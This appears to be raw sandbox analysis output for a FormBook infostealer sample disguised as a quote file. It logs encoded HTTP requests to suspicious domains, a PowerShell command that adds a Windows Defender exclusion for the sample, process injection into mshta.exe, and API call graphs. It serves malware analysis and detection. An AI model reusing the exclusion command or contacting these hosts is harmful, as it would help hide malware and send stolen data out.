                                                                                                                                                                                                                                              Content-Length: 315
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                              56 | 192.168.2.5 | 50038 | 67.223.117.169 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:05.803985119 CEST | 486 | OUT | GET /3x2e/?7Bohe=LxBS6Twi9uZYinzDVhZFrrwHDjbbsejF2aCFyI0NTfR3MRAzX3VYMflTVpKBnal2v445F0Z9ZuD89KJE1ZsSKujcQCdh/qxt+vHDLhQvad3slFytU7/EPl4Sr/TZznzmuw==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.rtpsilva4d.click
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:06.469444990 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:21:06 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 315
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                              57 | 192.168.2.5 | 50039 | 129.226.56.200 | 80
                                                                                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:14.642524004 CEST | 482 | OUT | GET /28kl/?7Bohe=ZkKAB6qSK6F5HsjBEzwiMizWOSJwTbSi5er0Koahj7mpnIIYqRoLKzbDk71u2k+MO6tmUyIoyOO9F/o0RCIBFZEb81/8BfbGrnNiAiZNS4xvfhhZvRECGHuLoGBIxYjXhw==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.dxfwrc2h.sbs
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:15.608798027 CEST306INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: Tengine
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:21:15 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 58, Source IP: 192.168.2.5, Source Port: 50040, Destination IP: 162.0.215.33, Destination Port: 80
Timestamp: Oct 24, 2024 15:21:21.307502985 CEST, Bytes transferred: 767, Direction: OUT
POST /4bpc/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.nieuws-july202491.sbs/4bpc/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=b40V17h4HrXyy9mxjCS5E4OfpGuWhWgHEK/2JnCX99O60K/W5ICWFOoODjhfbX5YbvLJLKDn2zuOFTqZii2QamCe87yPThv9KykjxtEi4+xF1fdZZN1hxvUayFPUpinvD/YstEtMLwXFuKdcNTTgOqNhvGtRmjbsib11sNW5XWuZwr2I9aaHifXs0QwUWt6Ud9j9aMc=
Timestamp: Oct 24, 2024 15:21:21.986254930 CEST, Bytes transferred: 1236, Direction: IN
HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                              date: Thu, 24 Oct 2024 13:21:21 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                              connection: close


                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:09:17:08
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\QUOTE2342534.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\QUOTE2342534.exe"
                                                                                                                                                                                                                                              Imagebase:0x4c0000
                                                                                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                                                                                              MD5 hash:C19949939D08BAEE86643132D7CE7542
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:09:17:09
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe"
                                                                                                                                                                                                                                              Imagebase:0x4f0000
                                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:09:17:09
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\QUOTE2342534.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\QUOTE2342534.exe"
                                                                                                                                                                                                                                              Imagebase:0xc60000
                                                                                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                                                                                              MD5 hash:C19949939D08BAEE86643132D7CE7542
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:09:17:09
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:09:17:12
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                              Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:09:17:12
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe"
                                                                                                                                                                                                                                              Imagebase:0x120000
                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:09:17:14
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\mshta.exe"
                                                                                                                                                                                                                                              Imagebase:0x470000
                                                                                                                                                                                                                                              File size:13'312 bytes
                                                                                                                                                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                              Start time:09:17:26
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe"
                                                                                                                                                                                                                                              Imagebase:0x120000
                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:09:17:38
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff79f9e0000
                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:11.4%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:3.6%
                                                                                                                                                                                                                                                Total number of Nodes:165
                                                                                                                                                                                                                                                Total number of Limit Nodes:8
APIs
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 089F2D27
Memory Dump Source
• Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID:
• API String ID: 1778838933-0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 295 efd3c9-efd467 GetCurrentProcess 299 efd469-efd46f 295->299 300 efd470-efd4a4 GetCurrentThread 295->300 299->300 301 efd4ad-efd4e1 GetCurrentProcess 300->301 302 efd4a6-efd4ac 300->302 303 efd4ea-efd505 call efd5a8 301->303 304 efd4e3-efd4e9 301->304 302->301 308 efd50b-efd53a GetCurrentThreadId 303->308 304->303 309 efd53c-efd542 308->309 310 efd543-efd5a5 308->310 309->310
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EFD456
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00EFD493
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EFD4D0
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00EFD529
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 317 efd3d8-efd467 GetCurrentProcess 321 efd469-efd46f 317->321 322 efd470-efd4a4 GetCurrentThread 317->322 321->322 323 efd4ad-efd4e1 GetCurrentProcess 322->323 324 efd4a6-efd4ac 322->324 325 efd4ea-efd505 call efd5a8 323->325 326 efd4e3-efd4e9 323->326 324->323 330 efd50b-efd53a GetCurrentThreadId 325->330 326->325 331 efd53c-efd542 330->331 332 efd543-efd5a5 330->332 331->332
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EFD456
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00EFD493
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EFD4D0
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00EFD529
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 405 89fe934-89fe9d5 407 89fea0e-89fea2e 405->407 408 89fe9d7-89fe9e1 405->408 415 89fea67-89fea96 407->415 416 89fea30-89fea3a 407->416 408->407 409 89fe9e3-89fe9e5 408->409 410 89fea08-89fea0b 409->410 411 89fe9e7-89fe9f1 409->411 410->407 413 89fe9f5-89fea04 411->413 414 89fe9f3 411->414 413->413 417 89fea06 413->417 414->413 422 89feacf-89feb89 CreateProcessA 415->422 423 89fea98-89feaa2 415->423 416->415 418 89fea3c-89fea3e 416->418 417->410 420 89fea61-89fea64 418->420 421 89fea40-89fea4a 418->421 420->415 424 89fea4e-89fea5d 421->424 425 89fea4c 421->425 436 89feb8b-89feb91 422->436 437 89feb92-89fec18 422->437 423->422 427 89feaa4-89feaa6 423->427 424->424 426 89fea5f 424->426 425->424 426->420 428 89feac9-89feacc 427->428 429 89feaa8-89feab2 427->429 428->422 431 89feab6-89feac5 429->431 432 89feab4 429->432 431->431 434 89feac7 431->434 432->431 434->428 436->437 447 89fec1a-89fec1e 437->447 448 89fec28-89fec2c 437->448 447->448 449 89fec20 447->449 450 89fec2e-89fec32 448->450 451 89fec3c-89fec40 448->451 449->448 450->451 452 89fec34 450->452 453 89fec42-89fec46 451->453 454 89fec50-89fec54 451->454 452->451 453->454 457 89fec48 453->457 455 89fec66-89fec6d 454->455 456 89fec56-89fec5c 454->456 458 89fec6f-89fec7e 455->458 459 89fec84 455->459 456->455 457->454 458->459 461 89fec85 459->461 461->461
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 089FEB76
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 963392458-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 462 89fe940-89fe9d5 464 89fea0e-89fea2e 462->464 465 89fe9d7-89fe9e1 462->465 472 89fea67-89fea96 464->472 473 89fea30-89fea3a 464->473 465->464 466 89fe9e3-89fe9e5 465->466 467 89fea08-89fea0b 466->467 468 89fe9e7-89fe9f1 466->468 467->464 470 89fe9f5-89fea04 468->470 471 89fe9f3 468->471 470->470 474 89fea06 470->474 471->470 479 89feacf-89feb89 CreateProcessA 472->479 480 89fea98-89feaa2 472->480 473->472 475 89fea3c-89fea3e 473->475 474->467 477 89fea61-89fea64 475->477 478 89fea40-89fea4a 475->478 477->472 481 89fea4e-89fea5d 478->481 482 89fea4c 478->482 493 89feb8b-89feb91 479->493 494 89feb92-89fec18 479->494 480->479 484 89feaa4-89feaa6 480->484 481->481 483 89fea5f 481->483 482->481 483->477 485 89feac9-89feacc 484->485 486 89feaa8-89feab2 484->486 485->479 488 89feab6-89feac5 486->488 489 89feab4 486->489 488->488 491 89feac7 488->491 489->488 491->485 493->494 504 89fec1a-89fec1e 494->504 505 89fec28-89fec2c 494->505 504->505 506 89fec20 504->506 507 89fec2e-89fec32 505->507 508 89fec3c-89fec40 505->508 506->505 507->508 509 89fec34 507->509 510 89fec42-89fec46 508->510 511 89fec50-89fec54 508->511 509->508 510->511 514 89fec48 510->514 512 89fec66-89fec6d 511->512 513 89fec56-89fec5c 511->513 515 89fec6f-89fec7e 512->515 516 89fec84 512->516 513->512 514->511 515->516 518 89fec85 516->518 518->518
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 089FEB76
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 963392458-0

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00EFAF9E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                • Opcode ID: cabbe5d4af61d1f2ab534a072b1ee7a25155a6b2968400f7cf0beffc0a356daf
                                                                                                                                                                                                                                                • Instruction ID: 17da786129805b02332e2e046f280427677c5efaa3296594a65815783390d6ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cabbe5d4af61d1f2ab534a072b1ee7a25155a6b2968400f7cf0beffc0a356daf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC8169B0A00B098FDB24DF69D14576ABBF1FF88304F04892DD58AEBA50D735E945CB92

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00EF59C9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                • Opcode ID: 36a7258990198c49343d46d493e6acaaed950f336a834c80dc09134ce764968c
                                                                                                                                                                                                                                                • Instruction ID: f92859ffb4194bd56547faa0bd1e7721616b7a16a5eab1553c920f52193a6a9e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36a7258990198c49343d46d493e6acaaed950f336a834c80dc09134ce764968c
